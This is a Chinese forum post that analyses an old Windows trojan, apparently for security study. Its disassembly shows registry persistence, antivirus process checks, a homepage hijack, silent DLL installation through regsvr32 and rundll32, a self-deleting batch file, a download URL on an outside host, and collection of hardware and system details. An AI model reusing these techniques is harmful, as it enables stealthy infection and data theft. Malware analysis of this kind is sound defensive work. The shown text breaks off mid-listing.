好友
阅读权限30
听众
最后登录1970-1-1
|
h_one
发表于 2013-8-31 17:36
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
本帖最后由 zxcfvasd 于 2013-8-31 17:36 编辑
闲着没事干,在虚拟机里乱翻,发现了好像是我以前下载的病毒。那时根本不敢接触,呵呵,现在我来看看这个干了什么坏事。
一.简介
病毒名称:xxxx
病毒类型: 木马
感染系统:windows
加壳: 无
开发工具: Microsoft Visual C++ 6.0
病毒描述
病毒运行后利用time()系统时间作为种子,随机生成病毒文件,添加病毒注册表启动项,遍历进程查找"ravmond.exe"进程,与“360”进程。
衍生两个随机生成dl文件到system32目录下,检查system32\dllcache目录下是否存在dll,若不存在首先创建dll文件,然后写入释放的dll,检测D
盘下是否存在ssshall目录,如不存在则创建,使用regsvr32/s注册病毒释放的DLL组件,调用rundll32.exe隐藏安装病毒DLL文件,锁定主页为 http://www.rom12580.cn,将母本写入xxggyu.exe,并执行,利用母本释放的批处理文件,删除母本。
二.详细分析
1.对注册表操作
首先是call 4012E8
利用time()作为随机种子,rand 产生随机数,每次产生的随机数 temp % 0x1A(26) + 0x61 这样进行5次, 得到字符,并压入字符串.dll,这样母本就生成了可变的dll文件名 (zeovn.dll)
00403005 |. E8 E6E5FFFF call 病毒样本.004015F0 添加异常处理例程
00403011 |. E8 6CE3FFFF call 病毒样本.00401382 这个函数与call 4012E8函数相同,也是利用time()做种子,然后生成随机的dll文件名(pozl9.dll)
这个dll名后面后写入注册表
写入注册表 HKEY_LOCAL_MACHINE\SOFTWARE\Softfy\PlugName
名称LogonName 数据 pozl9.dll(母本随机参数字符串)
名称LogonMainName 数据pozl9.dll
0040141D /$ B8 8C184000 mov eax,病毒样本.0040188C
00401422 |. E8 C9010000 call 病毒样本.004015F0
00401427 |. 83EC 0C sub esp,0xC
0040142A |. 8365 FC 00 and [local.1],0x0
0040142E |. 8D4D E8 lea ecx,[local.6]
00401431 |. E8 C7FCFFFF call 病毒样本.004010FD
00401436 |. 68 60E04300 push 病毒样本.0043E060 ; ASCII "SOFTWARE\Softfy\PlugName"
0040143B |. 68 02000080 push 0x80000002 ; HKEY_LOCAL_MACHINE
00401440 |. 8D4D E8 lea ecx,[local.6]
00401443 |. C645 FC 01 mov byte ptr ss:[ebp-0x4],0x1
00401447 |. E8 4BFDFFFF call 病毒样本.00401197 ; RegCreateKeyEx 打开子键
0040144C |. 85C0 test eax,eax
0040144E |. 75 20 jnz X病毒样本.00401470
00401450 |. FF75 08 push [arg.1] ; pozl9.dll
00401453 |. 8D4D E8 lea ecx,[local.6]
00401456 |. 68 54E04300 push 病毒样本.0043E054 ; ASCII "LogonName"
0040145B |. E8 BB0B0000 call 病毒样本.0040201B ; RegSetValuesEx设置子键名LogonName, 数据值pozl9.dll
00401460 |. FF75 08 push [arg.1]
00401463 |. 8D4D E8 lea ecx,[local.6]
00401466 |. 68 44E04300 push 病毒样本.0043E044 ; ASCII "LogonMainName"
0040146B |. E8 AB0B0000 call 病毒样本.0040201B ; 同样设置键名LogonMainName,数据pozl9.dll
00401470 |> 8D4D E8 lea ecx,[local.6]
00401473 |. E8 55FDFFFF call 病毒样本.004011CD
00401478 |. 8065 FC 00 and byte ptr ss:[ebp-0x4],0x0
0040147C |. 8D4D E8 lea ecx,[local.6]
0040147F |. E8 AEFCFFFF call 病毒样本.00401132
接下来的一个call同样是对注册表的操作
在HKEY_LOCAL_MACHINE\SOFTWARE\Softfy\Plug子键下增加
名称PlugUserName 数据full80
名称PlugSoftName 数据C2
名称PlugSoftVer 数据1.0.1
名称 PlugUpdate 数据 3.6.7
名称PlugSendNum 数据 0x00
名称LoadNums 数据 0x00
名称CoreDll 数据 0x01
名称PlugStat 数据 0x00
在HKEY_LOCAL_MACHINE\ SOFTWARE\Softfy\PlugDown"
名称PulgOne 数据 1.0.0
名称PulgTwo 数据 1.0.0
在Softfy子键下还增加了很多
2遍历进程,寻找ravmond.exe进程 (瑞星)
进入call 返回1时表示找到ravmond.exe进程
(当寻找瑞星是失败时,使用同样的方法查看是否运行360) 咦这个木马,只是查看这两个杀软是否存在,没发现是怎么过杀软的啊。奇怪,可能我找的这枚病毒真的太老了。这里只是猜测,看看后面做了哪些处理
0040116B /$ 56 push esi
0040116C |. 8BF1 mov esi,ecx
0040116E |. FF7424 0C push dword ptr ss:[esp+0xC]
00401172 |. 8D4E 08 lea ecx,dword ptr ds:[esi+0x8]
00401175 |. E8 38030000 call <jmp.&MFC42.#860>
0040117A |. 83C6 04 add esi,0x4
0040117D |. 56 push esi ; /pHandle
0040117E |. 68 3F000F00 push 0xF003F ; |Access = KEY_ALL_ACCESS
00401183 |. 6A 00 push 0x0 ; |Reserved = 0
00401185 |. FF7424 18 push dword ptr ss:[esp+0x18] ; |Subkey
00401189 |. FF7424 18 push dword ptr ss:[esp+0x18] ; |hKey = HKEY_CLASSES_ROOT
0040118D |. FF15 0C504000 call dword ptr ds:[<&ADVAPI32.RegOpenK>; \RegOpenKeyExA
00401193 |. 5E pop esi
00401194 \. C2 0800 retn 0x8
2.ie劫持, 查找IEXPLORE.EXE锁定主页为 http://www.rom12580.cn
HKEY_CLASSES_ROOTCLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command
0040424E |. 8D85 E4FEFFFF lea eax,[local.71]
00404254 |. 68 40E34300 push 病毒样本.0043E340 ; /src = " "
00404259 |. 50 push eax ; |dest
0040425A |. E8 79D3FFFF call <jmp.&MSVCRT.strcat> ; \strcat
0040425F |. 8D85 E4FEFFFF lea eax,[local.71]
00404265 |. 68 28E34300 push 病毒样本.0043E328 ; /src = "http://www.rom12580.cn"
0040426A |. 50 push eax ; |dest
0040426B |. E8 68D3FFFF call <jmp.&MSVCRT.strcat> ; \strcat
00404270 |. 83C4 2C add esp,0x2C
00404273 |. 8D4D E8 lea ecx,[local.6]
00404276 |. 68 E0E24300 push 病毒样本.0043E2E0 ; ASCII "CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command"
0040427B |. 68 00000080 push 0x80000000
00404280 |. E8 E6CEFFFF call 病毒样本.0040116B
00404285 |. 85C0 test eax,eax
00404287 |. 5E pop esi
00404288 |. 75 11 jnz X病毒样本.0040429B
0040428A |. 8D85 E4FEFFFF lea eax,[local.71]
00404290 |. 8D4D E8 lea ecx,[local.6]
00404293 |. 50 push eax
00404294 |. 6A 00 push 0x0
00404296 |. E8 A8DDFFFF call 病毒样本.00402043
0040429B |> 834D FC FF or [local.1],0xFFFFFFFF
0040429F |. 8D4D E8 lea ecx,[local.6]
004042A2 |. E8 8BCEFFFF call 病毒样本.00401132
锁定主页为 http://www.rom12580.cn
00402044 |. 8BF1 mov esi,ecx
00402046 |. FF7424 0C push dword ptr ss:[esp+0xC] ; /s
0040204A |. E8 C1F5FFFF call <jmp.&MSVCRT.strlen> ; \strlen
0040204F |. 59 pop ecx
00402050 |. 40 inc eax
00402051 |. 50 push eax ; /BufSize
00402052 |. FF7424 10 push dword ptr ss:[esp+0x10] ; |Buffer = 0012FDC4
00402056 |. 6A 02 push 0x2 ; |ValueType = REG_EXPAND_SZ
00402058 |. 6A 00 push 0x0 ; |Reserved = 0
0040205A |. FF7424 18 push dword ptr ss:[esp+0x18] ; |ValueName
0040205E |. FF76 04 push dword ptr ds:[esi+0x4] ; |hKey
00402061 |. FF15 00504000 call dword ptr ds:[<&ADVAPI32.RegSetVa>; \RegSetValueExA
00402067 |. 5E pop esi
00402068 \. C2 0800 retn 0x8
继续进入下一个call,发现依然是对注册表的操作
添加"Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" 名称 NoInternetIcon 数值 0x1
作用:从桌面及任务栏上的“快速启动”上删除 Internet Explorer 图标
004042B3 /$ B8 34194000 mov eax,病毒样本.00401934
004042B8 |. E8 33D3FFFF call 病毒样本.004015F0
004042BD |. 83EC 0C sub esp,0xC
004042C0 |. 8D4D E8 lea ecx,[local.6]
004042C3 |. E8 35CEFFFF call 病毒样本.004010FD
004042C8 |. 8365 FC 00 and [local.1],0x0
004042CC |. 68 88E34300 push 病毒样本.0043E388 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
004042D1 |. 68 02000080 push 0x80000002
004042D6 |. 8D4D E8 lea ecx,[local.6]
004042D9 |. E8 8DCEFFFF call 病毒样本.0040116B ; RegOpenKeyEx 打开、Policies\Explorer子键
004042DE |. 85C0 test eax,eax
004042E0 |. 75 0F jnz X病毒样本.004042F1
004042E2 |. 6A 01 push 0x1
004042E4 |. 68 78E34300 push 病毒样本.0043E378 ; ASCII "NoInternetIcon"
004042E9 |. 8D4D E8 lea ecx,[local.6]
004042EC |. E8 0FDDFFFF call 病毒样本.00402000 ; RegSetValueKeyEx设置键值
004042F1 |> 8D4D E8 lea ecx,[local.6]
004042F4 |. E8 D4CEFFFF call 病毒样本.004011CD
004042F9 |. 834D FC FF or [local.1],0xFFFFFFFF
004042FD |. 8D4D E8 lea ecx,[local.6]
00404300 |. E8 2DCEFFFF call 病毒样本.00401132
00404305 |. 8B4D F4 mov ecx,[local.3]
00404308 |. 64:890D 00000>mov dword ptr fs:[0],ecx
进入下一个call
RegDeleteValue HKEY_LOCAL_ROOT\lnkfile子键下IsShortcut (这样可以去掉桌面的快捷方式小箭头)
0040432A |. 68 D0E34300 push 病毒样本.0043E3D0 ; ASCII "lnkfile"
0040432F |. 68 00000080 push 0x80000000 ; HKEY_LOACL_ROOT
00404334 |. 8D4D E8 lea ecx,[local.6]
00404337 |. E8 2FCEFFFF call 病毒样本.0040116B ; RegOpenKeyEx
0040433C |. 85C0 test eax,eax
0040433E |. 75 0D jnz X病毒样本.0040434D
00404340 |. 68 C4E34300 push 病毒样本.0043E3C4 ; ASCII "IsShortcut"
00404345 |. 8D4D E8 lea ecx,[local.6]
00404348 |. E8 1EDDFFFF call 病毒样本.0040206B ; RegDeleteValue HKEY_LOCAL_ROOT\lnkfile子键下IsShortcut
0040434D |> 8D4D E8 lea ecx,[local.6]
00404350 |. E8 78CEFFFF call 病毒样本.004011CD
00404355 |. 68 C8000000 push 0xC8 ; /Timeout = 200. ms
0040435A |. FF15 54504000 call dword ptr ds:[<&KERNEL32.Sleep>] ; \Sleep
00404360 |. 6A 00 push 0x0
00404362 |. 6A 00 push 0x0
00404364 |. 6A 00 push 0x0
00404366 |. 68 00000008 push 0x8000000
0040436B |. FF15 B4514000 call dword ptr ds:[<&SHELL32.SHChangeNotify>] ; SHELL32.SHChangeNotify
00404371 |. 834D FC FF or [local.1],0xFFFFFFFF
接下调用FindFirstFile函数,判断C:\Windows\System32\xxxxx.dll文件是否存在。若果不存在,调用CreateFile,WriteFile 写入母本释放的dll文件
上图中,可以跟随数据窗口422042,发现确实是一pe文件
接下来同样方法判断c:\windows\system32\dllcache\ralf2.dll文件
同样方法先判断c:\windos\system32\dllcache\oyran.dll ,不存在掉用writefile 将母本携带的数据写入dll
00403345 |. 57 push edi ; /pOverlapped => NULL
00403346 |. 50 push eax ; |pBytesWritten
00403347 |. 8D45 0A lea eax,dword ptr ss:[ebp+0xA] ; |
0040334A |. 6A 02 push 0x2 ; |nBytesToWrite = 2
0040334C |. 50 push eax ; |Buffer
0040334D |. 53 push ebx ; |hFile
0040334E |. C645 0A 4D mov byte ptr ss:[ebp+0xA],0x4D ; |
00403352 |. C645 0B 5A mov byte ptr ss:[ebp+0xB],0x5A ; |
00403356 |. FFD6 call esi ; \WriteFile
00403358 |. 8D45 FC lea eax,[local.1]
0040335B |. 57 push edi ; /pOverlapped => NULL
0040335C |. 50 push eax ; |pBytesWritten
0040335D |. 68 FE9F0000 push 0x9FFE ; |nBytesToWrite = 9FFE (40958.)
00403362 |. 68 22604000 push 病毒样本.00406022 ; |Buffer = 病毒样本.00406022
00403367 |. 53 push ebx ; |hFile
00403368 |. FFD6 call esi ; \WriteFile
创建D:\ssshall文件夹
00403221 |. E8 7AE2FFFF call <jmp.&MFC42.#540>
00403226 |. 33F6 xor esi,esi
00403228 |. 68 9CE04300 push 病毒样本.0043E09C ; ASCII "D:\ssshall"
0040322D |. 8D4D F0 lea ecx,[local.4]
00403230 |. 8975 FC mov [local.1],esi
00403233 |. E8 7AE2FFFF call <jmp.&MFC42.#860>
00403238 |. 51 push ecx
00403239 |. 8D45 F0 lea eax,[local.4]
0040323C |. 8BCC mov ecx,esp
0040323E |. 8965 EC mov [local.5],esp
00403241 |. 50 push eax
00403242 |. E8 5BE3FFFF call <jmp.&MFC42.#535>
00403247 |. E8 4CFFFFFF call 病毒样本.00403198 ; FindFirstFile D:\ssshall文件是否存在
0040324C |. 3BC6 cmp eax,esi
0040324E |. 59 pop ecx
0040324F |. 75 19 jnz X病毒样本.0040326A
00403251 |. 51 push ecx
00403252 |. 8D45 F0 lea eax,[local.4]
00403255 |. 8BCC mov ecx,esp
00403257 |. 8965 EC mov [local.5],esp
0040325A |. 50 push eax
0040325B |. E8 42E3FFFF call <jmp.&MFC42.#535>
00403260 |. E8 74FFFFFF call 病毒样本.004031D9
00403265 |. 3BC6 cmp eax,esi
00403267 |. 59 pop ecx
00403268 |. 74 1C je X病毒样本.00403286
0040326A |> 51 push ecx
0040326B |. 8D45 F0 lea eax,[local.4]
0040326E |. 8BCC mov ecx,esp
00403270 |. 8965 EC mov [local.5],esp
00403273 |. 50 push eax
00403274 |. E8 29E3FFFF call <jmp.&MFC42.#535>
00403279 |. E8 77FFFFFF call 病毒样本.004031F5
0040327E |. 3BC6 cmp eax,esi
00403280 |. 59 pop ecx
00403281 |. 74 03 je X病毒样本.00403286
00403283 |. 6A 01 push 0x1
00403285 |. 5E pop esi
00403286 |> 834D FC FF or [local.1],0xFFFFFFFF
接下来,使用Regsvr32命令将动态链接库文件(oyran.dll)注册为注册表中的命令组成。
0040338E |. 8D45 F0 lea eax,[local.4]
00403391 |. C745 AC 44000>mov [local.21],0x44
00403398 |. 50 push eax ; /pProcessInfo
00403399 |. 8D45 AC lea eax,[local.21] ; |
0040339C |. 50 push eax ; |pStartupInfo
0040339D |. 56 push esi ; |CurrentDir
0040339E |. 56 push esi ; |pEnvironment
0040339F |. 6A 20 push 0x20 ; |CreationFlags = NORMAL_PRIORITY_CLASS
004033A1 |. 56 push esi ; |InheritHandles
004033A2 |. 56 push esi ; |pThreadSecurity
004033A3 |. 56 push esi ; |pProcessSecurity
004033A4 |. FF75 08 push [arg.1] ; |CommandLine
004033A7 |. 56 push esi ; |ModuleFileName
004033A8 |. FF15 24504000 call dword ptr ds:[<&KERNEL3>; \CreateProcessA
004033AE |. 5E pop esi ; regsvr32 /s c;\windows\system32\oyran.dll
004033AF |. C9 leave ; 将dll文件注册为注册表中的组成命令/s运行不产生消息
ralf2.dll注入到rundll32.exe进程并运行 InstallMyDll"隐藏安装病毒DLL文件
004032A2 |. 8BEC mov ebp,esp
004032A4 |. 81EC 04010000 sub esp,0x104
004032AA |. 8D85 FCFEFFFF lea eax,[local.65]
004032B0 |. 68 B8E04300 push 病毒样本.0043E0B8 ; /src = "rundll32 "
004032B5 |. 50 push eax ; |dest
004032B6 |. E8 17E3FFFF call <jmp.&MSVCRT.strcpy> ; \strcpy
004032BB |. FF35 E8E54300 push dword ptr ds:[0x43E5E8] ; /src = "ralf2.dll"
004032C1 |. 8D85 FCFEFFFF lea eax,[local.65] ; |
004032C7 |. 50 push eax ; |dest
004032C8 |. E8 0BE3FFFF call <jmp.&MSVCRT.strcat> ; \strcat
004032CD |. 8D85 FCFEFFFF lea eax,[local.65]
004032D3 |. 68 A8E04300 push 病毒样本.0043E0A8 ; /src = " , InstallMyDll"
004032D8 |. 50 push eax ; |dest
004032D9 |. E8 FAE2FFFF call <jmp.&MSVCRT.strcat> ; \strcat
004032DE |. 83C4 18 add esp,0x18
004032E1 |. 8D85 FCFEFFFF lea eax,[local.65]
004032E7 |. 50 push eax ; /String
004032E8 |. FF15 50504000 call dword ptr ds:[<&KERNEL3>; \OutputDebugStringA
004032EE |. 8D85 FCFEFFFF lea eax,[local.65]
004032F4 |. 6A 05 push 0x5 ; /ShowState = SW_SHOW
004032F6 |. 50 push eax ; |CmdLine “rundll32 ralf2.dll, InstallMyDll” InstallMyDll??待会儿看看这个dll
004032F7 |. FF15 58504000 call dword ptr ds:[<&KERNEL3>; \WinExec
004032FD |. C9 leave
接下来将母本写入xxggyu.exe,并执行
00401077 /$ 55 push ebp
00401078 |. 8BEC mov ebp,esp
0040107A |. 81EC 04010000 sub esp,0x104
00401080 |. 8D85 FCFEFFFF lea eax,[local.65]
00401086 |. 68 04010000 push 0x104 ; /BufSize = 104 (260.)
0040108B |. 50 push eax ; |Buffer
0040108C |. FF15 4C504000 call dword ptr ds:[<&KERNEL32.GetWindows>; \GetWindowsDirectoryA
00401092 |. 8D85 FCFEFFFF lea eax,[local.65]
00401098 |. 68 30004100 push 病毒样本.00410030 ; /src = "\system32\"
0040109D |. 50 push eax ; |dest
0040109E |. E8 35050000 call <jmp.&MSVCRT.strcat> ; \strcat
004010A3 |. 8D85 FCFEFFFF lea eax,[local.65]
004010A9 |. 68 24004100 push 病毒样本.00410024 ; /src = "xxggyu.exe"
004010AE |. 50 push eax ; |dest
004010AF |. E8 24050000 call <jmp.&MSVCRT.strcat> ; \strcat
004010B4 |. 8D85 FCFEFFFF lea eax,[local.65]
004010BA |. 50 push eax
004010BB |. E8 E3010000 call 病毒样本.004012A3
004010C0 |. 83C4 14 add esp,0x14
004010C3 |. 85C0 test eax,eax
004010C5 |. 75 1A jnz X病毒样本.004010E1
004010C7 |. 8D85 FCFEFFFF lea eax,[local.65]
004010CD |. 50 push eax ; /String
004010CE |. FF15 50504000 call dword ptr ds:[<&KERNEL32.OutputDebu>; \OutputDebugStringA
004010D4 |. 8D85 FCFEFFFF lea eax,[local.65]
004010DA |. 50 push eax
004010DB |. E8 20FFFFFF call 病毒样本.00401000
004010E0 |. 59 pop ecx
004010E1 |> 68 C8000000 push 0xC8 ; /Timeout = 200. ms
004010E6 |. FF15 54504000 call dword ptr ds:[<&KERNEL32.Sleep>] ; \Sleep
004010EC |. 8D85 FCFEFFFF lea eax,[local.65]
004010F2 |. 6A 01 push 0x1 ; /ShowState = SW_SHOWNORMAL
004010F4 |. 50 push eax ; |CmdLine = "C:\WINDOWS\system32\xxggyu.exe"
004010F5 |. FF15 58504000 call dword ptr ds:[<&KERNEL32.WinExec>] ; \WinExec
接下来创建批处理文件375O540.bat 并执行
004040DB |. BE D4E24300 mov esi,病毒样本.0043E2D4 ; ASCII "375O540.bat"
004040E0 |. F3:AB rep stos dword ptr es:[edi]
004040E2 |. 66:AB stos word ptr es:[edi]
004040E4 |. AA stos byte ptr es:[edi]
004040E5 |. 8D7D F4 lea edi,[local.3]
004040E8 |. 8D85 ECFEFFFF lea eax,[local.69]
004040EE |. A5 movs dword ptr es:[edi],dword ptr ds:[es>
004040EF |. A5 movs dword ptr es:[edi],dword ptr ds:[es>
004040F0 |. 68 04010000 push 0x104 ; /BufSize = 104 (260.)
004040F5 |. 50 push eax ; |PathBuffer
004040F6 |. 53 push ebx ; |hModule => NULL
004040F7 |. A5 movs dword ptr es:[edi],dword ptr ds:[es>; |
004040F8 |. FF15 28504000 call dword ptr ds:[<&KERNEL32.GetModuleF>; \GetModuleFileNameA
004040FE |. 8D85 ECF6FFFF lea eax,[local.581]
00404104 |. 68 C8E24300 push 病毒样本.0043E2C8 ; /String2 = "@echo off
"
00404109 |. 50 push eax ; |String1
0040410A |. FF15 40504000 call dword ptr ds:[<&KERNEL32.lstrcpyA>] ; \lstrcpyA
00404110 |. 8B35 3C504000 mov esi,dword ptr ds:[<&KERNEL32.lstrcat>; kernel32.lstrcatA
00404116 |. 6A 0A push 0xA
00404118 |. 5F pop edi ; 写的次数
00404119 |> 8D85 ECF6FFFF /lea eax,[local.581]
0040411F |. 68 ACE24300 |push 病毒样本.0043E2AC ; ASCII "@echo 375O540>>575.aqq
"
00404124 |. 50 |push eax
00404125 |. FFD6 |call esi
00404127 |. 4F |dec edi
00404128 |.^ 75 EF \jnz X病毒样本.00404119
0040412A |. 8D85 ECF6FFFF lea eax,[local.581]
00404130 |. 68 9CE24300 push 病毒样本.0043E29C ; ASCII "@del 575.aqq
"
00404135 |. 50 push eax
00404136 |. FFD6 call esi
00404138 |. 8D85 ECF6FFFF lea eax,[local.581]
0040413E |. 68 94E24300 push 病毒样本.0043E294 ; ASCII "@del ""
00404143 |. 50 push eax
00404144 |. FFD6 call esi
00404146 |. 8D85 ECFEFFFF lea eax,[local.69]
0040414C |. 50 push eax
0040414D |. 8D85 ECF6FFFF lea eax,[local.581]
00404153 |. 50 push eax
00404154 |. FFD6 call esi
00404156 |. 8D85 ECF6FFFF lea eax,[local.581]
0040415C |. 68 90E24300 push 病毒样本.0043E290 ; ASCII ""
"
00404161 |. 50 push eax
00404162 |. FFD6 call esi
00404164 |. 8D85 ECF6FFFF lea eax,[local.581]
0040416A |. 68 88E24300 push 病毒样本.0043E288 ; ASCII "@del "
0040416F |. 50 push eax
00404170 |. FFD6 call esi
00404172 |. 8D45 F4 lea eax,[local.3]
00404175 |. 50 push eax
00404176 |. 8D85 ECF6FFFF lea eax,[local.581]
0040417C |. 50 push eax
0040417D |. FFD6 call esi
0040417F |. 8D85 ECF6FFFF lea eax,[local.581]
00404185 |. 68 80E24300 push 病毒样本.0043E280 ; ASCII "
@exit"
批处理文件作用就是,删除自身并退出
现在去浏览网页发现,不能访问了。哎,看了这木马早被爆火眼了。母体部分就到这了,接下来看看释放出的两个个dll文件
二。
现在我们去看看,名称中带有字符串的dll,我这次是ralf2.dll。在dll主要是获取计算机信息,立连接到服务器,并准备下载的指定URL的数据
拖入Dependency 看是都导出InstallMyDll
发现果然导出InstallMyDll,说明注入到rundll32.exe,并调用dll的InstallMyDll启动。我们去看看他到底干了啥。
使用IDA查看ralf2.dll,我去病毒作者真是丧心病狂啊,尽然dll还是用MFC向导创建。这里又给我们增加了难度。
对于
MFC 应用程序类派生于CWinApp InitInstance 这个函数 为虚函数,也为程序初始化点 eax为虚函数表起址 所以见到call [eax+0x58]就进去看看
首先创建两个线程:
第二个线程
第一个call创建互斥体,保证系统中只运行一个被注入的实例程序
10005E74 /$ 55 push ebp
10005E75 |. 8BEC mov ebp,esp
10005E77 |. 51 push ecx
10005E78 |. 8B4D 08 mov ecx,[arg.1]
10005E7B |. 8365 FC 00 and [local.1],0x0
10005E7F |. 68 84890110 push imkt0.10018984 ; ASCII "http://www.fyyaya.cn/plug/HtmlPeek.dll"
10005E84 |. E8 611C0000 call <jmp.&MFC42.#537>
10005E89 |. 8B45 08 mov eax,[arg.1]
10005E8C |. C9 leave
遍历进程查找ravmond.exe(瑞星杀毒软件)
100055BE |. 57 push edi ; /ProcessID => 0
100055BF |. 6A 02 push 0x2 ; |Flags = TH32CS_SNAPPROCESS
100055C1 |. 897D FC mov [local.1],edi ; |
100055C4 |. E8 E12D0000 call <jmp.&KERNEL32.CreateToo>; \CreateToolhelp32Snapshot
100055C9 |. 8BF0 mov esi,eax
100055CB |. 8D85 C8FEFFFF lea eax,[local.78]
100055D1 |. 50 push eax ; /lppe
100055D2 |. 56 push esi ; |hSnapshot
100055D3 |. C785 C8FEFFFF>mov [local.78],0x128 ; |
100055DD |. E8 C22D0000 call <jmp.&KERNEL32.Process32>; \Process32First
100055E2 |> 3BC7 /cmp eax,edi
100055E4 |. 74 44 |je Ximkt0.1000562A
100055E6 |. 8D85 ECFEFFFF |lea eax,[local.69]
100055EC |. 8D4D F0 |lea ecx,[local.4]
100055EF |. 50 |push eax
100055F0 |. E8 CB240000 |call <jmp.&MFC42.#860>
100055F5 |. 8D4D F0 |lea ecx,[local.4]
100055F8 |. E8 25260000 |call <jmp.&MFC42.#4202>
100055FD |. 68 AC870110 |push imkt0.100187AC ; ASCII "ravmond.exe"
10005602 |. 8D4D F0 |lea ecx,[local.4]
10005605 |. E8 B0240000 |call <jmp.&MFC42.#2764>
1000560A |. 83F8 FF |cmp eax,-0x1
1000560D |. 75 0F |jnz Ximkt0.1000561E
1000560F |. 8D85 C8FEFFFF |lea eax,[local.78]
10005615 |. 50 |push eax ; /lppe
10005616 |. 56 |push esi ; |hSnapshot
10005617 |. E8 822D0000 |call <jmp.&KERNEL32.Process3>; \Process32Next
找到将eax = 1 放到 ds:[0x10019508】
1000561E |> \6A 01 push 0x1
10005620 |. 58 pop eax ; eax = 1
10005621 |. A3 08950110 mov dword ptr ds:[0x10019508],eax
10005626 |. 8BF8 mov edi,eax
10005628 |. EB 0D jmp Ximkt0.10005637
1000562A |> 56 push esi ; /hObject
1000562B |. FF15 84F00010 call dword ptr ds:[<&KERNEL32.CloseHandle>; \CloseHandle
判断系统版本号 版本号低于5返回0,存放到ds:[0x10019504】
1000540E /$ FF15 24F00010 call dword ptr ds:[<&KERNEL32.GetVersion>>; kernel32.GetVersion
10005414 |. 3C 06 cmp al,0x6
10005416 |. 1BC0 sbb eax,eax
10005418 |. 40 inc eax
10005419 \. C3 retn
接下来打开母本中写入的注册表项
100056C4 |. E8 CD230000 call <jmp.&MFC42.#540>
100056C9 |. 68 10880110 push imkt0.10018810 ; ASCII "SOFTWARE\Softfy\CSID"
100056CE |. 68 02000080 push 0x80000002
100056D3 |. 8D4D E8 lea ecx,[local.6]
100056D6 |. C645 FC 01 mov byte ptr ss:[ebp-0x4],0x1
100056DA |. E8 310B0000 call imkt0.10006210
100056DF |. 85C0 test eax,eax
100056E1 |. 75 38 jnz Ximkt0.1000571B
100056E3 |. 68 F0940110 push imkt0.100194F0
100056E8 |. 68 08880110 push imkt0.10018808 ; ASCII "csid"
100056ED |. 8D4D E8 lea ecx,[local.6]
100056F0 |. E8 41790000 call imkt0.1000D036
100056F5 |. 68 EC940110 push imkt0.100194EC
100056FA |. 68 00880110 push imkt0.10018800 ; ASCII "dllname"
100056FF |. 8D4D E8 lea ecx,[local.6]
10005702 |. E8 2F790000 call imkt0.1000D036
10005707 |. 68 E8940110 push imkt0.100194E8
1000570C |. 68 F8870110 push imkt0.100187F8 ; ASCII "dllpath"
10005711 |. 8D4D E8 lea ecx,[local.6]
10005714 |. E8 1D790000 call imkt0.1000D036
10005719 |. EB 54 jmp Ximkt0.1000576F
1000571B |> 68 D0870110 push imkt0.100187D0 ; ASCII "{C4560D12-CE25-4A2E-A5D4-B5070FCBE282}"
10005720 |. B9 F0940110 mov ecx,imkt0.100194F0
10005725 |. E8 96230000 call <jmp.&MFC42.#860>
1000572A |. 68 C4870110 push imkt0.100187C4 ; ASCII "cyiky.dll"
1000572F |. B9 EC940110 mov ecx,imkt0.100194EC
10005734 |. E8 87230000 call <jmp.&MFC42.#860>
10005739 |. 8D85 E0FEFFFF lea eax,[local.72]
得到计算机名
100065F8 C745 FC FF00000>mov dword ptr ss:[ebp-0x4],0xFF
100065FF FF15 14F00010 call dword ptr ds:[<&KERNEL32.GetComputerNameA>] ; kernel32.GetComputerNameA
10006605 8B4D 08 mov ecx,dword ptr ss:[ebp+0x8]
10006608 8D85 FCFEFFFF lea eax,dword ptr ss:[ebp-0x104]
CreateFileA打开第一磁盘--->>调用DeviceIoControl取SMART_RCV_DRIVE_DATA 硬盘序列号
10004CDC /75 1C jnz Xcbep6.10004CFA
10004CDE |53 push ebx
10004CDF |53 push ebx
10004CE0 |6A 03 push 0x3
10004CE2 |53 push ebx
10004CE3 |6A 03 push 0x3
10004CE5 |68 000000C0 push 0xC0000000
10004CEA |68 00860110 push cbep6.10018600 ; ASCII "\\.\PhysicalDrive0"
10004CEF |FF15 30F00010 call dword ptr ds:[<&KERNEL32.CreateFileA>] ; kernel32.CreateFileA
10004D30 83C4 18 add esp,0x18
10004D33 891D BC940110 mov dword ptr ds:[0x100194BC],ebx
10004D39 C705 98940110 0>mov dword ptr ds:[0x10019498],0x200
10004D43 C605 9D940110 0>mov byte ptr ds:[0x1001949D],0x1
10004D4A 53 push ebx
10004D4B 68 BC940110 push cbep6.100194BC
10004D50 57 push edi
10004D51 56 push esi
10004D52 6A 23 push 0x23
10004D54 55 push ebp
10004D55 68 88C00700 push 0x7C088
10004D5A C605 9E940110 0>mov byte ptr ds:[0x1001949E],0x1
10004D61 FF35 C0940110 push dword ptr ds:[0x100194C0]
10004D67 C605 A1940110 A>mov byte ptr ds:[0x100194A1],0xA0
10004D6E C605 A2940110 E>mov byte ptr ds:[0x100194A2],0xEC
10004D75 FF15 2CF00010 call dword ptr ds:[<&KERNEL32.DeviceIoControl>] ; kernel32.DeviceIoControl
10004D7B 5F pop edi ; 调用DeviceIoControl取SMART_RCV_DRIVE_DATA 硬盘序列号
接下来获取网卡信息
10005BA7 E8 C4240000 call cbep6.10008070
10005BAC 8D45 FC lea eax,dword ptr ss:[ebp-0x4]
10005BAF C745 FC 0028000>mov dword ptr ss:[ebp-0x4],0x2800
10005BB6 50 push eax
10005BB7 8D85 FCD7FFFF lea eax,dword ptr ss:[ebp-0x2804]
10005BBD 50 push eax
10005BBE E8 ED270000 call <jmp.&iphlpapi.GetAdaptersInfo>
10005BC3 85C0 test eax,eax
使用.CreateToolhelp32Snapshot->.Process32First->.Process32Next 三个函数计算当前系统运行多少个程序
1000473C 57 push edi
1000473D 6A 02 push 0x2
1000473F E8 663C0000 call <jmp.&KERNEL32.CreateToolhelp32Snapshot>
10004744 8BF0 mov esi,eax
10004746 8D85 D8FEFFFF lea eax,dword ptr ss:[ebp-0x128]
1000474C 50 push eax
